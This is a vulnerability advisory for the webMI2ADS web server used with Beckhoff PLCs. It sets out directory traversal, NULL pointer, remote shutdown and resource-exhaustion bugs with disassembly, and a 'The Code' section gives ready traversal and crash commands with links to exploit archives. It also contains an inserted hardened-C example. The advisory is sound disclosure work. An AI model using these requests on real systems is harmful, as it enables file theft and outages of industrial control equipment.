#######################################################################
Luigi Auriemma
Application: atvise webMI2ADS - Web server for Beckhoff PLCs
http://www.atvise.com/en/atvise-downloads/products
Versions: <= 1.0
Platforms: Windows XP embedded and CE x86/ARM
Bugs: A] directory traversal
B] NULL pointer
C] termination of the software
D] resources consumption
Exploitation: remote
Date: 10 Oct 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"webMI2ADS is a very slim and compact web server with an ADS interface
(Beckhoff native PLC interface). It can be integrated on nearly any
ethernet based Beckhoff PLC and provides full data access including
automatic import of all PLC variables and types."
#######################################################################
=======
2) Bugs
=======
----------------------
A] directory traversal
----------------------
Classic directory traversal through the backslash delimiter, which
allows reading the files located on the disk where the server is
running.
---------------
B] NULL pointer
---------------
NULL pointer dereference caused by the lack of a check on the value
returned by strchr while parsing the Authorization: Basic HTTP field:
0043094F |> 6A 06 PUSH 6 ; /maxlen = 6
00430951 |. 68 7CAB4400 PUSH webMI2AD.0044AB7C ; |s2 = "Basic "
00430956 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
00430959 |. 50 PUSH EAX ; |s1
0043095A |. FF15 10044400 CALL DWORD PTR DS:[<&MSVCR90._strnicmp>] ; \_strnicmp
...skip...
004309BC |. 6A 3A PUSH 3A ; /c = 3A (':')
004309BE |. 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108] ; |
004309C4 |. 51 PUSH ECX ; |s
004309C5 |. FF15 FC034400 CALL DWORD PTR DS:[<&MSVCR90.strchr>] ; \strchr
004309CB |. 83C4 08 ADD ESP,8
004309CE |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
004309D1 |. 837D FC 00 CMP DWORD PTR SS:[EBP-4],0
004309D5 |. 74 4B JE SHORT webMI2AD.00430A22
004309D7 |. 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]
004309DA |. 2B55 FC SUB EDX,DWORD PTR SS:[EBP-4]
004309DD |. 83FA 40 CMP EDX,40
004309E0 |. 7D 40 JGE SHORT webMI2AD.00430A22
004309E2 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
004309E5 |. C600 00 MOV BYTE PTR DS:[EAX],0
------------------------------
C] termination of the software
------------------------------
To terminate the software remotely it's enough to request the
/shutdown webpage.
------------------------
D] resources consumption
------------------------
An endless loop with memory consumption and CPU at 100%, caused by a
particular negative Content-Length value.
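Hardened versions of the two parsing steps behind bugs B] and D], as an added example (C written for this advisory, not webMI2ADS code): the credential split tests the strchr result before writing through it, and Content-Length is validated as a non-negative, bounded integer. Operating on the already base64-decoded credential string and the 1 MiB body cap are assumptions.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Split an already base64-decoded "user:password" credential (the buffer the
 * server holds after matching the "Basic " prefix). The disassembly above
 * writes a NUL through the strchr result without testing it for NULL; here
 * the test comes first. Returns 1 on success, 0 when the input is rejected. */
int split_credentials(char *decoded, char **user, char **pass)
{
    char *colon;

    if (decoded == NULL)
        return 0;
    colon = strchr(decoded, ':');
    if (colon == NULL)                      /* no ':' present: never dereference */
        return 0;
    if ((size_t)(colon - decoded) >= 0x40)  /* same 64-byte bound as the binary */
        return 0;
    *colon = '\0';
    *user = decoded;
    *pass = colon + 1;
    return 1;
}

/* Parse a trimmed Content-Length value into a non-negative size. Returns 1 on
 * success, 0 for negative, non-numeric, trailing-garbage or oversized values,
 * so a value such as "-30" is rejected before any request body is read. */
int parse_content_length(const char *value, size_t *out)
{
    char *end;
    long long n;

    if (value == NULL || *value == '\0')
        return 0;
    errno = 0;
    n = strtoll(value, &end, 10);
    if (errno == ERANGE || end == value || *end != '\0')
        return 0;
    if (n < 0 || n > 1024 * 1024)           /* 1 MiB body cap is an assumed limit */
        return 0;
    *out = (size_t)n;
    return 1;
}
```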
#######################################################################
===========
3) The Code
===========
http://aluigi.org/mytoolz/mydown.zip
http://www.exploit-db.com/sploits/17963-1.zip
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/17963-2.zip
A]
mydown http://SERVER/..\..\..\..\..\..\..\boot.ini
mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
B]
udpsz -c "GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n" -T -D SERVER 80 -1
D]
udpsz -c "POST / HTTP/1.0\r\nContent-Length: -30\r\n\r\n" -T -D SERVER 80 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################